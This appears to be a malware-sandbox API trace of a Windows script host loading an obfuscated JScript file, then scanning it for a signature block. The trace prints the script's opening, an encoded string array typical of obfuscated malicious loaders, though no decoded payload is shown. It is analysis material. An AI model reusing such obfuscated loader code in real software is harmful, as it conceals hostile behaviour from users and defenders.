	[0116.395] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x25e110 | out: ppv=0x25e110*=0x3bf4c0) returned 0x0
	[0116.399] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25c310 | out: lpSystemTimeAsFileTime=0x25c310*(dwLowDateTime=0xbda26cb0, dwHighDateTime=0x1d543d1)) 
	[0116.399] GetCurrentProcessId () returned 0x978
	[0116.399] GetCurrentThreadId () returned 0x8ec
	[0116.399] GetTickCount () returned 0x2d7f6
	[0116.399] QueryPerformanceCounter (in: lpPerformanceCount=0x25c318 | out: lpPerformanceCount=0x25c318*=24082514058) returned 1
	[0116.399] malloc (_Size=0x100) returned 0x3b7c70
	[0116.399] __dllonexit () returned 0x7fedf7914c0
	[0116.399] __dllonexit () returned 0x7fedf7914e8
	[0116.399] GetVersionExA (in: lpVersionInformation=0x25c0f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf792dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf7914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x25c0f0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0116.400] GetProcessWindowStation () returned 0x30
	[0116.813] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x25c0d8, nLength=0xc, lpnLengthNeeded=0x25c0d0 | out: pvInfo=0x25c0d8, lpnLengthNeeded=0x25c0d0) returned 1
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf060
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf0b0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf0e0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf120
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf160
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf1a0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf1e0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf220
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf260
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf2a0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf2e0
	[0116.813] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf330
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf370
	[0116.813] DllGetClassObject (in: rclsid=0x42e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25cde0 | out: ppv=0x25cde0*=0x3bf0b0) returned 0x0
	[0116.813] ??2@YAPEAX_K@Z () returned 0x3bf0b0
	[0116.814] IClassFactory:CreateInstance (in: This=0x3bf0b0, pUnkOuter=0x0, riid=0x25dbc0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25ce00 | out: ppvObject=0x25ce00*=0x3bf4c0) returned 0x0
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf3b0
	[0116.814] GetSystemInfo (in: lpSystemInfo=0x25cc40 | out: lpSystemInfo=0x25cc40*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0116.814] VirtualQuery (in: lpAddress=0x25ccb0, lpBuffer=0x25cc70, dwLength=0x30 | out: lpBuffer=0x25cc70*(BaseAddress=0x25c000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffffa80)) returned 0x30
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf3f0
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf410
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf470
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf4a0
	[0116.814] ??2@YAPEAX_K@Z () returned 0x3bf550
	[0116.814] IUnknown:AddRef (This=0x3bf4c0) returned 0x2
	[0116.814] IUnknown:Release (This=0x3bf4c0) returned 0x1
	[0116.814] IUnknown:Release (This=0x3bf0b0) returned 0x0
	[0116.814] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.814] IUnknown:QueryInterface (in: This=0x3bf4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x25e048 | out: ppvObject=0x25e048*=0x3bf4c0) returned 0x0
	[0116.814] IUnknown:Release (This=0x3bf4c0) returned 0x1
	[0116.814] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0116.814] IsTextUnicode (in: lpv=0x3ba4f0, iSize=19304, lpiResult=0x25e098 | out: lpiResult=0x25e098) returned 0
	[0116.814] GetACP () returned 0x4e4
	[0116.814] malloc (_Size=0x97d0) returned 0x26dfd0
	[0116.815] GetACP () returned 0x4e4
	[0116.815] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x3ba4f0, cbMultiByte=19304, lpWideCharStr=0x26dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0116.815] realloc (_Block=0x26dfd0, _Size=0x96d0) returned 0x26dfd0
	[0116.815] ??2@YAPEAX_K@Z () returned 0x3bf0b0
	[0116.816] free (_Block=0x26dfd0) 
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] CoUninitialize () 
	[0116.816] ??3@YAXPEAX@Z () returned 0x24f8e501
	[0116.816] CloseHandle (hObject=0x140) returned 1
	[0116.817] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0116.817] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0116.817] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.817] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0116.817] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0116.817] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.817] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.817] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.817] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.817] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.817] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0116.817] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.817] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0116.817] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0116.817] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0116.817] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0116.817] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0116.817] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0116.817] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.817] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.817] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0116.817] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0116.817] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0116.817] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.817] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0116.817] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.817] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.817] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0116.817] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0116.817] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.817] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.817] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0116.818] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0116.818] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.818] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0116.818] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.818] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.818] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.818] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.818] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.818] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.818] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.818] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0116.818] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0116.818] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.818] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.818] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.818] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0116.818] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.818] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0116.818] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.818] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.818] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.818] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.818] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0116.818] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.818] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0116.818] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0116.818] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0116.818] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.818] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.818] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.818] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.818] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.818] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.818] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.818] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0116.818] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.818] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0116.818] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.819] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.819] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0116.819] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.819] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.819] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.819] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
